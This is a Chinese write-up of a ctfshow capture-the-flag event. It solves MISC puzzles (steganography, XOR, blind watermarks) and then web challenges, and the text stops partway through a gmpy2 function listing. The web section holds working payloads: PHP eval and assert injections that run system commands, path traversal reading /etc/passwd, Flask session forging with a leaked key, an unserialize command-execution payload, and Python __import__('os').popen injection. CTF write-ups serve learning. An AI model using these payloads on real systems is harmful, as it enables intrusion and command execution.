前言:

写了很久,然后由于自己哪里配置错误,导致没有保存,很多东西可能丢失了,但是已经不想再补了

问卷调查

答完问卷即可得到flag

MISC

杂项签到

签到
下载附件解压等得到一张图片,010打开,一眼看到flag

image-20221114104545704.png

损坏的压缩包

下载附件直接尝试解压,发现无法作为压缩包打开
010打开,看到文件头 89 50 4E 47 为PNG图片文件头

image-20221114104655517.png

更改后缀为png打开即可看到flag

image-20221114104735845.png

迷之栅栏

下载附件解压后得到两张图片,分别为:
找不同1.png 跟
找不同2.png
010打开找到两段疑似 flag的数据

cfhwfaab2cb4af5a5820}

Ltso{06071f997b5bdd1a

逐位拼接得到flag

你会数数吗

下载附件解压 010打开得到:

d5851ijh7w6c3gb{hs1kso54he3{c5f4dsac{w9awdb2sd4gs{tefgtkk9b1917c9ehko41dtfc3ob2tgfc4557hsjj2oaagt{8{wh62cw1{i{f6hjhfl6gahwdwlf3bhtot}3w4b6dai47cw6o85{1haa2fctfcwdcfh8aolw{2al3{tie2jbead1o{49eesfw5f3oablhejls7hoaw5e1i1ls6c3c{5og6ojiswbsot3efs{d2j9o1d26ohecf395tkbhwfc2e8ciae2sfsbdaoc28iowf{ftw6cs1ftai141h4{o5ogwcastt{gkcg6w2hwofw88wtg145{4cjhh21hs3tadse{7t2{j2fecd7befbkhk1ogtds4kbsohls3hfadcgt44c2gci597
ww66djit21j3hatjt4{fii7ht27cit1tswb{8c3kg9ht51bc27ss5o3fg7e3{sffebs7}5d7aw1sos63c3bts86h}9kseco36d8cfc4bs}bawb3t{1gf22ecicahgsa1{lh8}o4t1td3tdofbfafta{ow1d2}4ob{tfbc0000000

可以看到里面存在ctfshow{}格式,猜测flag为其中字符出现的频率
使用010打开后打开直方图(Ctrl+Shift+T)或者点击-->tools-->HistoGram...
然后根据统计Percent进行升序与降序排列,在降序排列中看到flag

image-20221114105924558.png

你会异或吗

下载附件解压 010 打开 发现并没有什么规律,看到题目 为你会异或吗 并给出神秘数字:0x50,那么直接进行异或 并将神秘数字带入

image-20221114110238424.png

得到一张png图片,打开即为flag

image-20221114110528338.png

flag一分为二

下载附件解压打开发现是一张图片,直接更改高度,看到下面多了一串疑似flag的东西,但是像是后半部分:

image-20221114112529227.png

那么前半部分哪里去了呢?
盲水印?
直接用工具提取水印试试:

image-20221115165431330.png

得到:ctfshow{FirstP@RT
合一块:ctfshow{FirstP@RTSecondP@rTMikumiku~}

我是谁??

提示:答题输入对应的位置ID就可以了,比如在A行0列就输入A0就可以了。
30关通过后可以获得flag
如果想重新开始,删除cookies就可以了,但是游戏进度也丢失了。
顺便一提,之前的“用cookie存档”的功能已经没有咯,请各位擦亮眼睛开始吧~
因为出题项目组群名片都是宝可梦的名字,所以灵机一动出了这么一个题。当然猜的东西跟宝可梦也没有什么太大关系就对了。
希望大家看到这题的时候能会想起“看图识妹”和“日积月累”。祝大家在CTFshow玩得开心~

确实能做,就是有点费眼睛:

image-20221115160913462.png

将所有美女下载下来:

all_girl.png

将其转换为背影

big.png

这样是不是更容易一点了?什么?还是费眼睛?那就上脚本
exp:

import requests
from lxml import html
import cv2
import numpy as np
import json


url="http://3cdd442e-1aef-40ad-9ee2-f565a2d18c63.challenge.ctf.show/"

sess=requests.session()

all_girl=sess.get(url+'/static/all_girl.png').content

with open('all_girl.png','wb')as f:
        f.write(all_girl)

big_pic=cv2.imdecode(np.fromfile('all_girl.png', dtype=np.uint8), cv2.IMREAD_UNCHANGED)
big_pic=big_pic[50:,50:,:]
image_alpha = big_pic[:, :, 3]
mask_img=np.zeros((big_pic.shape[0],big_pic.shape[1]), np.uint8)
mask_img[np.where(image_alpha == 0)] = 255

cv2.imwrite('big.png',mask_img)



def answer_one(sess):
        #获取视频文件
        response=sess.get(url+'/check')
        if 'ctfshow{' in response.text:
                print(response.text)
                exit(0)
        tree=html.fromstring(response.text)
        element=tree.xpath('//source[@id="vsource"]')
        video_path=element[0].get('src')
        video_bin=sess.get(url+video_path).content
        with open('Question.mp4','wb')as f:
                f.write(video_bin)
        #获取有效帧
        video = cv2.VideoCapture('Question.mp4')
        frame=0
        while frame<=55:
                res, image = video.read()
                frame+=1
        #cv2.imwrite('temp.png',image)
        video.release()
        #获取剪影
        image=image[100:400,250:500]
        gray_image=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
        #cv2.imwrite('gray_image.png',gray_image)
        temp = np.zeros((300, 250), np.uint8)
        temp[np.where(gray_image>=128)]=255
        #去白边
        temp = temp[[not np.all(temp[i] == 255) for i in range(temp.shape[0])], :]
        temp = temp[:, [not np.all(temp[:, i] == 255) for i in range(temp.shape[1])]]
        #缩放至合适大小,肉眼大致判断是1.2倍,不一定准
        temp = cv2.resize(temp,None,fx=1.2,fy=1.2)
        #查找位置
        res =cv2.matchTemplate( mask_img,temp,cv2.TM_CCOEFF_NORMED)
        min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
        x,y=int(max_loc[0]/192),int(max_loc[1]/288)#为什么是192和288,因为大图去掉标题栏就是1920*2880
        guess='ABCDEFGHIJ'[y]+'0123456789'[x]
        print(f'guess:{guess}')
        #传答案
        response=sess.get(url+'/submit?guess='+guess)
        r=json.loads(response.text)
        if r['result']:
                print('guess right!')
                return True
        else:
                print('guess wrong!')
                return False

i=1

while i<=31:
        print(f'Round:{i}')
        if answer_one(sess):
                i+=1
        else:
                i=1

image-20221115162602478.png

You and me

下载附件得到两张图片

image-20221115163311771.png

盲水印试试:

image-20221115164804371.png

ctfshow{CDEASEFFR8846}

7.1.05

提示:754365305 + 无MOD + 全DLC

黑丝白丝还有什么丝

看视频 黑丝白丝
提示摩斯密码,那就容易了,慢慢看呗,边看边记 黑丝为 1 白丝为 0 转场动画为分割标志

011 000011 咦,她怎么把裙子脱了,???刚到哪了?
重新来 011 00001 10 1 1 000 这个尾巴,他是插件还是挂件?怎么这么涩? ... ?
...... 
011 00001 10 1 1 11111 1000 000 11 11 111 010 0 1010 001 1 0
再转换一下
.-- ....- -. - - ----- -... ...-- -- --- .-. . -. . -.-. ..- - .

image-20221115171713968.png

ctfshow{W4NTT0B3MORECUTE}

我吐了你随意

下载附件解压得到:
O宽隐写.txt

0宽在线加密解密‌‬‌‌‌‌‍‍

image-20221115172101510.png

这是个什么文件

下载附件解压,要密码
先用010看看是不是伪加密:

image-20221115172432079.png

确实是伪加密,将09 改为00保存重新解压,
好像提示了一下文件哪里错误来着,但是解压出来一个2文件,没有后缀,继续丢010,看到尾部:

image-20221115172859300.png

依稀能看到bytesÚdecodeÚflagÚprint© 2.py 字样,
查询后得知是反编译后的pyc文件,改后缀名为pyc

进行反编译
可以用:python在线反编译
得到:

#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.7

flag = bytes([
    99,
    116,
    102,
    115,
    104,
    111,
    119,
    123,
    99,
    100,
    106,
    110,
    106,
    100,
    95,
    53,
    54,
    53,
    102,
    95,
    71,
    67,
    68,
    72,
    95,
    107,
    99,
    114,
    105,
    109,
    125]).decode()
print(flag)

down下来跑一下:ctfshow{cdjnjd_565f_GCDH_kcrim}
或者你比较懒:

image-20221115173436672.png

抽象画

迅疾响应

我可没有骗你

下载附件解压,发现又有密码,直接爆破一下,得到密码为:55813329
得到 svega.mp3,拖进010看看,发现是个wav格式的文件
更改后缀,用SlientEye

image-20221115174759716.png

你被骗了

解压得到 nibeipianle.mp3
音频隐写,用Mp3Stego

image-20221115175526853.png

在副标题也看到有一个flag ,不过是假的

image-20221115174955734.png

一闪一闪亮晶晶

下载附件解压,有加密的部分,需要密码,但是还是能得到两个文件 what is this.png 与 一闪一闪亮晶晶.m4a
打开图片,发现是汉信码,

汉信码在线解码

解码得到:

image-20221115180343321.png

估计是压缩包密码,拿去解压发现打开是个无线电音频,直接上RX-SSTV能直接梭到flag

一层一层一层地剥开我的❤

打不开的图片

WEB

web签到

源码:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-10 17:20:38
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 09:38:59
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

很明显关键就在于这个嵌套了:

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

我记得本身Cookie的优先级好像就是最高的,这里Cookie:$_COOKIE['CTFshow-QQ群:']这里传入"CTFshow-QQ群:=a" ==> "POST['a']" ,POST传入值 a=b ==> GET['b'],同样地传入b=c就得到了REQUEST['c']。因此就能够接收到所有数据了
这里在get再传入c=xxx 那么上面的嵌套最后得到的值就是xxx
而题目这里后面还有一个6789[4] 通过这个给到eval,也就是数组下标的方式,那么只需要给c传一个数组即可。
最终payload:

http://dc45223c-e861-465f-a6c7-9fb32fc508a4.challenge.ctf.show/?b=c&c[0]=1&c[6][0][7][5][8][0][9][4][4])=system("id");

POST:a=b
Cookie:CTFshow-QQ群:=a

image-20221114123159692.png

web2 c0me_t0_s1gn

查看一下题目源码:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>c0me_t0_s1gn</title>
</head>
<body>
    <script>
Function.prototype.getMultiLine = function () {
  var lines = new String(this);
  lines = lines.substring(lines.indexOf("/*") + 3, lines.lastIndexOf("*/"));
  return lines;
}
var string = function () {

  /* Hi~here!Welcome To:
  ____ _____ _____    _                   
 / ___|_   _|  ___|__| |__   _____      __
| |     | | | |_ / __| '_ \ / _ \ \ /\ / /
| |___  | | |  _|\__ \ | | | (_) \ V  V / 
 \____| |_| |_|  |___/_| |_|\___/ \_/\_/   
    
  */
}
var key = 'u1`kp2o`v4`"~';
function _0x2158(_0x2d92a0, _0x4e67d7) {
  var _0xdf773c = _0x3533();
  return _0x2158 = function (_0x1331d0, _0xf92994) {
    _0x1331d0 = _0x1331d0 - (-0x3 * 0x44d + 0x9d4 + 0x3d1);
    var _0x3be124 = _0xdf773c[_0x1331d0];
    return _0x3be124;
  }, _0x2158(_0x2d92a0, _0x4e67d7);
}
function _0x3533() {
  var _0x2da453 = [
    'fromCharCo',
    '358752oHplkh',
    '206046vZErzF',
    'length',
    '294673lskVMd',
    'cAlET',
    'QCXVo',
    'charCodeAt',
    '1478463RJKJLo',
    '405930tsphuP',
    '701940jecjVP',
    '219256kHDFad'
  ];
  _0x3533 = function () {
    return _0x2da453;
  };
  return _0x3533();
}
(function (_0x250b06, _0x41a8f2) {
  var _0x582104 = _0x2158, _0x42b9d8 = _0x250b06();
  while (!![]) {
    try {
      var _0x292ae2 = -parseInt(_0x582104(0xc0)) / (-0x26e2 + -0xfcf + 0x36b2) + parseInt(_0x582104(0xc7)) / (-0x255b + -0x1f3c + -0x11 * -0x409) + -parseInt(_0x582104(0xbe)) / (0x196 + 0x1 * 0x1c22 + -0x1db5) + parseInt(_0x582104(0xc6)) / (-0x22 * 0xbe + 0x905 * -0x4 + -0x14 * -0x311) + parseInt(_0x582104(0xc5)) / (-0x13ac + -0xb4c + 0x1efd) + -parseInt(_0x582104(0xc9)) / (-0x2 * 0x165 + -0x2 * 0x562 + 0xd94) + parseInt(_0x582104(0xc4)) / (0x1790 + -0x1ca2 + 0x519);
      if (_0x292ae2 === _0x41a8f2)
        break;
      else
        _0x42b9d8['push'](_0x42b9d8['shift']());
    } catch (_0x12c7eb) {
      _0x42b9d8['push'](_0x42b9d8['shift']());
    }
  }
}(_0x3533, -0xf289 * -0x1 + 0x1bc06 + -0x5396));
function decypt(_0x17d553) {
  var _0x286b19 = _0x2158, _0x32b3ca = {
    'cAlET': function (_0x18c9f6, _0xe59d45) {
      return _0x18c9f6 < _0xe59d45;
    },
    'QCXVo': function (_0x3a6dcb, _0x898a55) {
      return _0x3a6dcb - _0x898a55;
    }
  }, _0x24471d = '';
  for (var _0x252b36 = 0x26bc + 0xd96 + -0x16a * 0x25; _0x32b3ca[_0x286b19(0xc1)](_0x252b36, _0x17d553[_0x286b19(0xbf)]); _0x252b36++) {
    _0x24471d += String[_0x286b19(0xc8) + 'de'](_0x32b3ca[_0x286b19(0xc2)](_0x17d553[_0x286b19(0xc3)](_0x252b36), 0x200 * 0x4 + 0x2683 + -0x2e82));
  }
  return _0x24471d;
}

(function (_0x4a4a9c, _0x1a76b9) {
    var _0x530d75 = _0x5295, _0x1d06ec = _0x4a4a9c();
    while (!![]) {
        try {
            var _0x5de7a9 = -parseInt(_0x530d75(0xfb)) / (-0x238c + -0x5 * 0x712 + -0x1 * -0x46e7) + -parseInt(_0x530d75(0xf4)) / (-0x2f1 + -0x2b3 * -0xc + -0x1 * 0x1d71) * (-parseInt(_0x530d75(0xf3)) / (-0x1 * 0x38f + 0x7 * -0x37f + -0x959 * -0x3)) + -parseInt(_0x530d75(0xf7)) / (0x1a7c + -0xcdb + 0x2b9 * -0x5) + parseInt(_0x530d75(0xf8)) / (0xaf3 + -0x20cc + 0x15de) + -parseInt(_0x530d75(0xfc)) / (0x1a3d + 0x3 * -0xc74 + 0xb25) * (-parseInt(_0x530d75(0xf9)) / (0x10ff + 0x1 * -0x17bf + -0x15b * -0x5)) + parseInt(_0x530d75(0xfe)) / (-0x2052 + -0xdee + 0x2e48) + -parseInt(_0x530d75(0xf6)) / (0x989 * 0x3 + -0x6 * 0xa9 + -0x189c) * (parseInt(_0x530d75(0xf5)) / (-0x2141 + -0x155d + -0xb * -0x4f8));
            if (_0x5de7a9 === _0x1a76b9)
                break;
            else
                _0x1d06ec['push'](_0x1d06ec['shift']());
        } catch (_0x1fb08f) {
            _0x1d06ec['push'](_0x1d06ec['shift']());
        }
    }
}(_0x4d54, -0xd5d60 + -0xe6bba + 0x29f4b9));
function g1ve_flag() {
    var _0x4457f6 = _0x5295, _0x2159b1 = {
            'xCWHB': function (_0x12a46b, _0x4b55bc) {
                return _0x12a46b(_0x4b55bc);
            }
        };
    console[_0x4457f6(0xfd)](_0x2159b1[_0x4457f6(0xfa)](decypt, key));
}
function _0x5295(_0x532fb7, _0x721c60) {
    var _0x4e8f64 = _0x4d54();
    return _0x5295 = function (_0x3549c7, _0x5b543a) {
        _0x3549c7 = _0x3549c7 - (0x9d * 0xd + -0x10 * 0x223 + 0x1b2a);
        var _0x7679df = _0x4e8f64[_0x3549c7];
        return _0x7679df;
    }, _0x5295(_0x532fb7, _0x721c60);
}
function _0x4d54() {
    var _0x3763e9 = [
        '2307260srudpE',
        '7538910jdFbir',
        '2254NeSztb',
        'xCWHB',
        '1784181eBXLnw',
        '27762LMTpLy',
        'log',
        '2956616JIZcnE',
        '3uXLNVD',
        '813212ucmCrx',
        '20lBzEDY',
        '2178864FqmWtY'
    ];
    _0x4d54 = function () {
        return _0x3763e9;
    };
    return _0x4d54();
}

window.console.log(string.getMultiLine());
function _0x35dc(_0x5cc2ea, _0x57b50d) {
    var _0x21448c = _0x10cb();
    return _0x35dc = function (_0x5968e9, _0x3be82b) {
        _0x5968e9 = _0x5968e9 - (-0x1fc8 + 0x213d * 0x1 + 0x3 * 0x7);
        var _0x563821 = _0x21448c[_0x5968e9];
        return _0x563821;
    }, _0x35dc(_0x5cc2ea, _0x57b50d);
}
function _0x10cb() {
    var _0x34fe42 = [
        'flag!',
        '1741160ZBOHmQ',
        'tion\x20\x22g1ve',
        '7XKtAnW',
        '4256265cuDdfw',
        '5401194atrStN',
        '22949118usOLCy',
        '_flag()\x22\x20t',
        '3050762jLNMKD',
        '5856945vpcLof',
        'o\x20get\x20the\x20',
        'n\x20the\x20func',
        'log',
        '4wsVthj',
        '\x20try\x20to\x20ru',
        '1739695Kgreaf'
    ];
    _0x10cb = function () {
        return _0x34fe42;
    };
    return _0x10cb();
}
var _0x4a7062 = _0x35dc;
(function (_0x460b36, _0x24df8c) {
    var _0x3bb4dd = _0x35dc, _0x29a620 = _0x460b36();
    while (!![]) {
        try {
            var _0x2a3d68 = -parseInt(_0x3bb4dd(0x18c)) / (0x12af * -0x1 + 0x6a * 0x53 + 0x3 * -0x53a) + parseInt(_0x3bb4dd(0x195)) / (-0x44f * -0x2 + -0xc66 + -0xa * -0x61) + parseInt(_0x3bb4dd(0x191)) / (-0x24f0 + -0xcb2 + 0x31a5 * 0x1) * (parseInt(_0x3bb4dd(0x18a)) / (-0x978 + -0x19 * -0x72 + -0x1a6)) + parseInt(_0x3bb4dd(0x196)) / (0x12fa * 0x2 + 0x705 + -0x66c * 0x7) + -parseInt(_0x3bb4dd(0x192)) / (-0x1 * 0x9d5 + -0x91e + 0x12f9) * (-parseInt(_0x3bb4dd(0x190)) / (-0x1 * 0x258a + -0x215d + 0x46ee)) + parseInt(_0x3bb4dd(0x18e)) / (-0x1721 + -0x1e27 * -0x1 + 0x2 * -0x37f) + -parseInt(_0x3bb4dd(0x193)) / (-0x8 * 0x164 + -0x2553 * -0x1 + -0x11 * 0x18a);
            if (_0x2a3d68 === _0x24df8c)
                break;
            else
                _0x29a620['push'](_0x29a620['shift']());
        } catch (_0x50e38d) {
            _0x29a620['push'](_0x29a620['shift']());
        }
    }
}(_0x10cb, 0x176437 + -0x110833 + 0x80a98), console[_0x4a7062(0x199)](_0x4a7062(0x18b) + _0x4a7062(0x198) + _0x4a7062(0x18f) + _0x4a7062(0x194) + _0x4a7062(0x197) + _0x4a7062(0x18d)));
    </script>

    <h1>Sign in</h1>
    <p>Hi~Ctfer</p><!-- ok you find something a part of flag :ctfshow{We1c0me_ -->
    <p>the page hide something you need use the god's eye to find</p>
    <!--and thre is a hint for another one: can can need 控制台(console)-->
</body>
</html>

能直接看到最后有 :ctfshow{We1c0me_
后面还有提示:and thre is a hint for another one: can can need 控制台(console)
打开控制台(console),发现还有更加明显地提示:

image-20221114123659108.png

拼接得到最终flag

我的眼里只有$

  • 题目描述:我的眼里只有你,你的眼里有没有我没有关系。
    群主果然还是骚的一~
    打开容器得到源码:

    <?php

    /*
    # -- coding: utf-8 --
    # @Author: h1xa
    # @Date: 2022-11-10 17:20:38
    # @Last Modified by: h1xa
    # @Last Modified time: 2022-11-11 08:21:54
    # @email: h1xa@ctfer.com
    # @link: https://ctfer.com

    */


error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);

变量覆盖+多重套娃
假设我们post传入_=a那么$_=a,如果在post传入a=b那么$$_=b,以此类推,最后一个的值是我们要传入eval的代码。
exp:

import string
S = string.ascii_letters 
POST='_=a&'
code="system('id');"
for i in range(35):
    POST+=S[i]+"="+S[i+1]+'&'

POST+=S[i]+'='+code
print(POST)

payload:

POST:_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=J&I=system('id');

这里看到群主的姿势也还是骚:
exp:

$str="_=__";
$res="";
echo "_=__&";
for ($i=0; $i < 34; $i++) { 
        $str="_".$str."_";
        echo $str."&";
        if($i==33){
                echo explode("=", $str)[1]."=eval(\$_GET[1]);";
        }
}

payload:
http://5bab997c-28cb-4244-8678-c23bba02197f.challenge.ctf.show/?1=system('id');

_=__&__=___&___=____&____=_____&_____=______&______=_______&_______=________&________=_________&_________=__________&__________=___________&___________=____________&____________=_____________&_____________=______________&______________=_______________&_______________=________________&________________=_________________&_________________=__________________&__________________=___________________&___________________=____________________&____________________=_____________________&_____________________=______________________&______________________=_______________________&_______________________=________________________&________________________=_________________________&_________________________=__________________________&__________________________=___________________________&___________________________=____________________________&____________________________=_____________________________&_____________________________=______________________________&______________________________=_______________________________&_______________________________=________________________________&________________________________=_________________________________&_________________________________=__________________________________&__________________________________=___________________________________&___________________________________=____________________________________&____________________________________=eval($_GET[1]);

抽老婆

打开页面发现n多二次元“老婆”,下载图片的地方发现有任意文件下载
http://dd07cc8c-12d8-431e-8003-0f39d495cbba.challenge.ctf.show/download?file=../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin

直接尝试读取flag,emmm
显然没这么简单
尝试随便读个文件,报错页面可以看出是python flask
读下源码试试file=../../app.py

# !/usr/bin/env python
# -*-coding:utf-8 -*-

"""
# File       : app.py
# Time       :2022/11/07 09:16
# Author     :g4_simon
# version    :python 3.9.7
# Description:抽老婆,哇偶~
"""

from flask import *
import os
import random
from flag import flag

#初始化全局变量
app = Flask(__name__)
app.config['SECRET_KEY'] = 'tanji_is_A_boy_Yooooooooooooooooooooo!'

@app.route('/', methods=['GET'])
def index():  
    return render_template('index.html')


@app.route('/getwifi', methods=['GET'])
def getwifi():
    session['isadmin']=False
    wifi=random.choice(os.listdir('static/img'))
    session['current_wifi']=wifi
    return render_template('getwifi.html',wifi=wifi)



@app.route('/download', methods=['GET'])
def source(): 
    filename=request.args.get('file')
    if 'flag' in filename:
        return jsonify({"msg":"你想干什么?"})
    else:
        return send_file('static/img/'+filename,as_attachment=True)


@app.route('/secret_path_U_never_know',methods=['GET'])
def getflag():
    if session['isadmin']:
        return jsonify({"msg":flag})
    else:
        return jsonify({"msg":"你怎么知道这个路径的?不过还好我有身份验证"})



if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80,debug=True)

有secret_keyapp.config['SECRET_KEY'] = 'tanji_is_A_boy_Yooooooooooooooooooooo!'
OK,那么题目就跟web入门大赛原题里面的某个题一样了emmm,是的 web736

image-20221114132009568.png

然后拿着生成的session去访问secret_path_U_never_know

image-20221114132148291.png

一言既出

源码:

<?php
highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){
    if ($_GET['num'] == 114514){
        assert("intval($_GET[num])==1919810") or die("一言既出,驷马难追!");
        echo $flag;
    } 
}

assert函数跟eval函数类似,能够执行php,这个题来讲直接闭合注释flag就出来了
因为下面有echo $flag;就不用那么麻烦
payload:

?num=114514);//

而如果想RCE的话就要构造一个为真的值绕过assert或者直接利用assert进行RCE

?num=114514)==1 or system('ls');#
编码一下:?num=114514)==1%20or%20system('ls')%3B%23

image-20221114135251906.png

驷马难追

源码:

<?php
highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){
     if ($_GET['num'] == 114514 && check($_GET['num'])){
              assert("intval($_GET[num])==1919810") or die("一言既出,驷马难追!");
              echo $flag;
     } 
} 

function check($str){
  return !preg_match("/[a-z]|\;|\(|\)/",$str);
}

下面增加了过滤,闭合不了了,可以运行加减乘除
payload:

?num=114514+1805296
加号需要URL编码
?num=114514%2b1805296

TapTapTap

只需要玩就能拿到flag,而且游戏也不难呢,非常良心的出题人

image-20221114140616630.png

当然,这样会比较费时间
直接F12
能够很明显的看到有
直接访问,能够找到关键点:

if ( gameEngine.levelNum > 20) {
  toolsBox.hidePage(pagePlayArea);
  toolsBox.showPage(pageLevelPassed);
  console.log(atob('WW91ciBmbGFnIGlzIGluIC9zZWNyZXRfcGF0aF95b3VfZG9fbm90X2tub3cvc2VjcmV0ZmlsZS50eHQ='));
  alert(atob('WW91ciBmbGFnIGlzIGluIC9zZWNyZXRfcGF0aF95b3VfZG9fbm90X2tub3cvc2VjcmV0ZmlsZS50eHQ='));
  }

进行查看一下:

image-20221114141408877.png

然后直接访问就得到flag了

Webshell

源码:

<?php 
    error_reporting(0);

    class Webshell {
        public $cmd = 'echo "Hello World!"';

        public function __construct() {
            $this->init();
        }

        public function init() {
            if (!preg_match('/flag/i', $this->cmd)) {
                $this->exec($this->cmd);
            }
        }

        public function exec($cmd) {
            $result = shell_exec($cmd);
            echo $result;
        }
    }

    if(isset($_GET['cmd'])) {
        $serializecmd = $_GET['cmd'];
        $unserializecmd = unserialize($serializecmd);
        $unserializecmd->init();
    }
    else {
        highlight_file(__FILE__);
    }

?>

非常简单的一个反序列化
poc:

<?php 
class Webshell {
    public $cmd = 'nl *>aaa.txt';
}
$a = new Webshell();
echo serialize($a);
?>

访问文件即可看到flag

化零为整

源码:

<?php

highlight_file(__FILE__);
include "flag.php";

$result='';

for ($i=1;$i<=count($_GET);$i++){
    if (strlen($_GET[$i])>1){
        die("你太长了!!");
        }
    else{
    $result=$result.$_GET[$i];
    }
}

if ($result ==="大牛"){
    echo $flag;
}

需要传入长度为1的字符,拼起来形成“大牛”
将其编码进行绕过:
"大牛" = “%E5%A4%A7%E7%89%9B”
payload:

?1=%E5&2=%A4&3=%A7&4=%E7&5=%89&6=%9B

无一幸免

源码:

<?php
include "flag.php";
highlight_file(__FILE__);

if (isset($_GET['0'])){
    $arr[$_GET['0']]=1;
    if ($arr[]=1){
        die($flag);
    }
    else{
        die("nonono!");
    }
}

直接传个空数组就可以了

image-20221114144240579.png

传说之下(雾)

贪吃蛇,2077分那不是,打扰了吗,每吃10个会加速一次,而且 格子是 25*25的,但是你吃了就会长,好像这么说这个玩游戏就拿不到flag
这个出题人怎么说呢?啊是探姬啊,那没事了
F12看到有一个 ./game.js
查看一下:

window.onload = function() {

Game = new Underophidian('gameCanvas')

游戏在Game下面,进入控制台尝试看一下能不能改分数
emmm显然是可以的:

image-20221114150359631.png

算力超群

打开容器发现是一个计算器
抓个包看看
Request:

GET /_calculate?number1=1&operator=%2B&number2=1 HTTP/1.1
Host: c7629724-9138-476c-b772-37f79532d1b3.challenge.ctf.show
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://c7629724-9138-476c-b772-37f79532d1b3.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.2.2029467934.1668405577; _gid=GA1.2.757366828.1668405577
Connection: close

看到为get传参方式,尝试输入敏感字符报错:

image-20221115084315879.png

分别对number1 operator number2进行测试,发现前两个均有过滤,但是number没有过滤
尝试执行命令:

http://c7629724-9138-476c-b772-37f79532d1b3.challenge.ctf.show/_calculate?number1=&operator=&number2=__import__(%27os%27).popen(%27id%27).read()


{
  "result": "uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n"
}

算力升级

如果我没记错的话,好像在web入门大赛原题里也有过类似的一道题(简而言之,做过类似的题)
python沙箱逃逸(pyjail) 上面那个题也算吧,虽然没过滤

提示:输入算式即可让R4帮你进行计算,本次R4重装升级,已经支持gmpy2了,可以使用gmpy2的函数进行计算,那我们赶快开始吧!
可以本地看下gmpy2:

>>> dir(gmpy2)
['Default', 'DivisionByZeroError', 'ExponentOutOfBoundsError', 'InexactResultError', 'InvalidOperationError', 'OverflowResultError', 'RangeError', 'RoundAwayZero', 'RoundDown', 'RoundToNearest', 'RoundToZero', 'RoundUp', 'UnderflowResultError', '__doc__', '__file__', '__name__', '__package__', '_cvsid', '_mpmath_create', '_mpmath_normalize', '_printf', 'acos', 'acosh', 'add', 'agm', 'ai', 'asin', 'asinh', 'atan', 'atan2', 'atanh', 'bincoef', 'bit_clear', 'bit_flip', 'bit_length', 'bit_mask', 'bit_scan0', 'bit_scan1', 'bit_set', 'bit_test', 'c_div', 'c_div_2exp', 'c_divmod', 'c_divmod_2exp', 'c_mod', 'c_mod_2exp', 'cbrt', 'ceil', 'check_range', 'comb', 'const_catalan', 'const_euler', 'const_log2', 'const_pi', 'context', 'copy_sign', 'cos', 'cosh', 'cot', 'coth', 'csc', 'csch', 'degrees', 'denom', 'digamma', 'digits', 'div', 'div_2exp', 'divexact', 'divm', 'eint', 'erf', 'erfc', 'exp', 'exp10', 'exp2', 'expm1', 'f2q', 'f_div', 'f_div_2exp', 'f_divmod', 'f_divmod_2exp', 'f_mod', 'f_mod_2exp', 'fac', 'factorial', 'fib', 'fib2', 'floor', 'fma', 'fmod', 'fms', 'frac', 'frexp', 'from_binary', 'fsum', 'gamma', 'gcd', 'gcdext', 'get_cache', 'get_context', 'get_emax_max', 'get_emin_min', 'get_exp', 'get_max_precision', 'hamdist', 'hypot', 'ieee', 'inf', 'invert', 